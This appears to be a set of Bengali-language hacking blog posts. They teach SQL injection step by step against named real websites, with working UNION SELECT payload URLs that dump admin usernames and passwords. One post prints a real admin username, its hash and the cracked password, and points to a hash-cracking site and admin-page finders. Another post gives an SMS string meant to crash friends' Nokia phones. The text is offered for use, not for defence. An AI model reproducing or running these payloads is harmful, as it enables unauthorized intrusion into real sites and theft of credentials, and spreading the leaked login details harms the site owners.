http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6--

অথবা এখানে ক্লিক করুন Click here
তাহলে আপনি আপনার স্ক্রীণে ভার্সন দেখতে পাবেন। ভার্সন পাবেন ৫.something. মানে ৫ থেকে বেশি পাবেন।  তবে কিছু কিছু ক্ষেত্র ৫ এর কম হয়, কারণ “information_schema” এ কোন ডেটাবেজ থাকে না।

https://www.facebook.com/unselected
table names খুঁজে বের করাঃ-
এবার “table_name” এ ভ্যালুয়ারেবল কলাম দিন।

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from   information_schema.tables where table_schema=database()--

অথবা এখানে ক্লিক করুন Click here
আমরা একটি পেলাম

https://www.facebook.com/unselected
এবার সকল টেবিল পেতে ব্যবহার করুন group_concat

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where                                             table_schema=database()--

অথবা এখানে ক্লিক করুন Click here
column names খুঁজে বের করাঃ-
এক রকম সকল টেবিল পেতে এটি ব্যবহার করুন ‘table’ with ‘column’

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--

অথবা এখানে ক্লিক করুন Click here
আমরা এখন পরিবর্তনে ‘id’ পেলাম। এটা থেকে আমরা জানব যে, কোন টেবিলের কোন কলাম

https://www.facebook.com/unselected
কলাম থেকে ডাটা নিয়ে আসা
এখন আমরা যে কোন একটি কলাম থেকে ডাটা নিয়ে আসবো। কিন্তু যেটা সবচেয়ে মজার বিষয় সেটা হল username ও password.
এই কলামের প্রথম টেবিল হল tar_admin. এখন আমরা “0x3a” কমান্ডটি ব্যবহার করবো। এটা ব্যবহার করা হয়, যাতে রেজাল্টের একটা সাথে আরেকটা কোলন দিয়ে আলাদা আলাদ থাকে। এটাকে বলে hex of colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--.

অথবা এখানে ক্লিক করুন Click Here

https://www.facebook.com/unselected
তাহলে আমরা ইউজার নেম ও পাসওয়ার্ড পেয়ে যাবো। কিন্তু পাসওয়ার্ড encrypted করা থাকে। বেশির ভাগ encryptions are crackable. এখন যে কোন একটি ইউজারনেম নেন। যেমনঃ- “Sneds”. পাসওয়ার্ড 7d372d3f4ad3116c9e455b20e946dd15 থেকে encrypted করতে হবে।

http://md5crack.com/crackmd5.php

উপরে লিংকে গিয়ে hashed(encrypted) password টি দিন ও ক্র্যাক করে নিন। এখন আমরা পাসওয়ার্ডটি একদমই সহজ ভাষায় পেলাম। আর সেটা হল ‘oorwullie’
ওয়েবসাইটের লগইন পেজ কোথায় পাবো ?
অনেক কষ্টে হ্যাস ক্র্যাক করে পাসওয়ার্ড বের করলাম সাথে ইউজারনেম জোগাড় করলাম। কিন্তু এখন এগুলো দিয়ে উক্ত সাইট ক্র্যাক করবো??? কোন সমস্যা নাই :)
বেশিরভাগ ওয়েবসাইটের লগইন পেজ ডিফল্ট ভাবে এক জায়গায় থাকে। এখন কিছু নমুনা দেখেনঃ——>
www.xyz.com ————————-> www.xyz.com/admin
www.xyz.com ————————-> www.xyz.com/administrator
www.xyz.com ————————-> www.xyz.com/adminlogin
আর যদি কারও খুঁজে পেতে সমস্যা হয়, তাহলে আমার এই টিউটোরিয়ালটি দেখতে পারেন।
এছাড়াও আপনি admin page finder নামের একটা টুলস ব্যবহার করতে পারেন। http://www.ziddu.com/errortracking.php?msg=File%20not%20found&fname=Admin_Finder.rar



send sms to your friends and restart her mobile
আসুন শিখে ফেলি কিভাবে আপনি SMS পাঠিয়ে আপনার বন্ধুদের মোবাইল রিস্ট্রাট করে দিতে পারেন। এটা খুব। মজার একটা বিষয় শুধু মাত্র নিচের কোড টি SMS করে পাঠিয়ে দিলেই ফোন রিস্ট্রাট হবে। এই জিনিসটা শুধু  Nokia- 1110,1110i,1112,1100,2100 মডেলের হজ্যান্ডসেট গুলো রিস্ট্রাট দিতে পারে।
কোড
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
শুধু  উপরের কোডটি মেসেজ বক্সে টাইপ করে সেন্ড করে দিন আপনার Nokia- 1110, 1110i, 1112, 1100, 2100 মডেলের নোকিয়া সেটের নাম্বারের।
আপনার মোবাইল থেকে এসএমএস পাঠেতে টাকা লাগবে, তাই আমি আপনাদের শিখিয়ে দিচ্ছি  কিভাবে নেট থেকে ফ্রী এসএমএস পাঠানো যায়।
http://uthsms.net/?on=sms

সবাই ভাল থাকবেন…


what is SQL and how to hack a website [ part-2]
SQL
SQL Inj3cti0n কি ?
সহজ ভাষায় বলতে গেলে SQL Inj3cti0n হলো এমন একটি code inj3cti0n কৌশল যা কোনো সাইটের ডাটাবেজের সিকিউরিটি কে ভেঙ্গে তা থেকে ইনফরমেশন বের করতে পারে।
যে কোনো সাইটে SQL Inj3cti0n করা যাবে ?
না। SQL Inj3cti0n তখনি কাজ করবে যখন কোনো সাইটে SQL error থাকবে।
কোনো সাইটে SQL error আছে কি নেই তা বুজবো কিভাবে ?
যেই সব সাইটে id=value থাকে ধরুন
http://www.site.com/news.php?id=5
সাধারণত এই সব সাইটে SQL error থাকে। কোনো সাইটে SQL error এভাবেই দেখাবে না, error দেখার জন্য আপনাকে url এর শেষে একটি '(string) দিতে হবে।
উদাহরণঃ http://www.bayviewhotelni.com/news.php?id=3 এটি হচ্ছে আসল লিঙ্ক, এই লিঙ্কে যখন আপনি ব্রাউজারে লোড করবেন তখন কোনো error আসবে না। যখন আপনি url এর শেষে একটি '(string) দিবেন তখন ঠিকই error আসবে।
http://www.bayviewhotelni.com/news.php?id=3'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3''' at line 1
অথবা অনেক সময় দেখতে পারবেন যখন ' বসিয়েছেন তখন সাইটে যদি কোনো ছবি/ডাটা মিস করে তাহলে ও অই সাইটে SQL error আছে।
অর্থাৎ বোঝা গেলো এই সাইটে SQL error আছে। তাই আমরা এই সাইটটি কে SQL Inj3cti0n করেন হ্যাক করতে পারবো।
কিভাবে SQL inj3ction করবো কোনো সাইটকে ?
প্রথমে আমরা মজিলাতে একটি এডন ইন্সটল করবো যার নাম হচ্ছে HaCkBar. এই এডনটি ব্যবহার করলে কিছু কমান্ড দিতে সহজ হয়।
ডাউনলোড করে নিন এখান থেকে : https://addons.mozilla.org/en-us/firefox/addon/hackbar/
ইন্সটল করার পরেই দেখবেন আপনার ব্রাউজারে এডনটি দেখা যাচ্ছে।
সাইটের মোট কলাম নাম্বার বের করার নিয়ম :-
আপনি যখন SQL error কোনো সাইটকে SQL Inj3cti0n করতে যাবেন তখন আপনার প্রথম কাজ হবে সাইটের ডাটাবেজে মোট কয়টি কলাম আছে তা বের করা। আর বের করার পদ্ধতি হলো order by কমান্ড।
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 1--
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 2--
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 3--
এভাবে যেতে থাকবেন যতক্ষণ পর্যন্ত কোনো Err0r না আসে।
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 11--
দিলে কিছু লিখা অদৃশ্য হয়ে যায় অর্থাৎ এই সাইটটিতে মোট 10 টি কলাম আছে।
Vulnerable কলাম বের করার নিয়ম :-
এখন আমাদের দেখতে হবে এই সাইটের ১০ টি কলামের মধ্যে কতটি কলাম vulnerable. যেই সব কলাম vulnerable সেই সব কলাম থেকেই ডাটাবেজ এর ইনফরমেশন বের করা যাবে। আমরা Union Select কমান্ড ব্যবহার করে সাইটের vulnerable কলাম গুলা বের করবো।
প্রথমে union select তারপরে যে কইটি কলাম সে কলাম গুলা ঠিক এভাবে বসাতে হবে। আর id=value er আগে একটি - চিহ্ন বসাতে হবে যেমন- http://www.sparkleappealdorset.org/supporter.php?id=-7
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,2,3,4,5,6,7,8,9,10--
ডাটাবেজ ভার্শন বের করার নিয়ম:-
যে কোনো একটি vulnerable কলামে আমরা SQL কমান্ড বসাবো যাতে আমরা ডাটাবেজের ইনফরমেশন বের করতে পারি। কোনো সাইটের ডাটাবেজ এর ভার্শন যদি 4 হয় তাহলে তা ম্যানুয়ালি inj3ct করা যাবে না। তখন টুলস ব্যবহার করতে হবে like havij । আর যদি 5 হয় তাহলে আমরা ম্যানুয়ালি inj3ct করতে পারবো।
এই সাইটটিতে অনেক গুলা vulnerable কলাম আমাদের যে কোনো একটিকে বাছাই করে নিতে হবে।
ধরি আমরা ২ নাম্বার কলাম থেকে ডাটাবেজ ভার্শন বের করবো।
তাহলে syntax টি হবে
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,version(),3,4,5,6,7,8,9,10--
vulnerable কলামে version() রিপ্লেস করলেই ডাটাবেজের ভার্শন চলে আসবে।
ডাটাবেজ থেকে টেবিল বের করার নিয়ম :-
vulnerable কলামের জাগায় group_concat(table_name) এবং এক দম শেষ কলামের পরে from information_schema.tables where table_schema=database()--
তাহলে syntax টি দাড়ায়
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
যে টেবিল গুলো আমরা পেলাম তা হলো event,galleryImage,login_admin,supporter
এখানে এডমিন টেবিল হচ্ছে login_admin, এই টেবিল থেকে আমরা এডমিনের ইউসার এবং পাসওয়ার্ড বের করবো।
এডমিন টেবিল থেকে ইউজার এবং পাসওয়ার্ড বের করার নিয়ম :-
vulnerable কলামের জাগায় group_concat(column_name) এবং এক দম শেষ কলামের পরে from information_schema.columns where table_name=0xএডমিন টেবিল নামের হেক্স কোড--
তাহলে syntax টি দাড়ায়
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e--
এডমিন ইউসার এবং পাসওয়ার্ড বের করার নিয়ম :-
vulnerable কলামের জাগায় concat{যে কলাম গুলো পেয়েছেন সে গুলো(সব গুলো কলাম নয় সুধু মাত্র ইউসার এবং পাসওয়ার্ড এর কলাম)} এবং এক দম শেষ কলামের পরে কোন টেবিল থেকে এই কলাম পেয়েছেন সেই টেবিলের নাম।
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,concat(uid,0x3a,pwd),3,4,5,6,7,8,9,10 from login_admin--
বাস পেয়ে গেলেন সাইটের এডমিন পাসওয়ার্ড । এখন পুরো সাইটি আপনার হাতে যা খুশি তাই করুন। তবে মারাত্মক কোনো ক্ষতি না করাই ভালো। সহজেই হয়ে গেলেন একজন ওয়েব হ্যাকার :P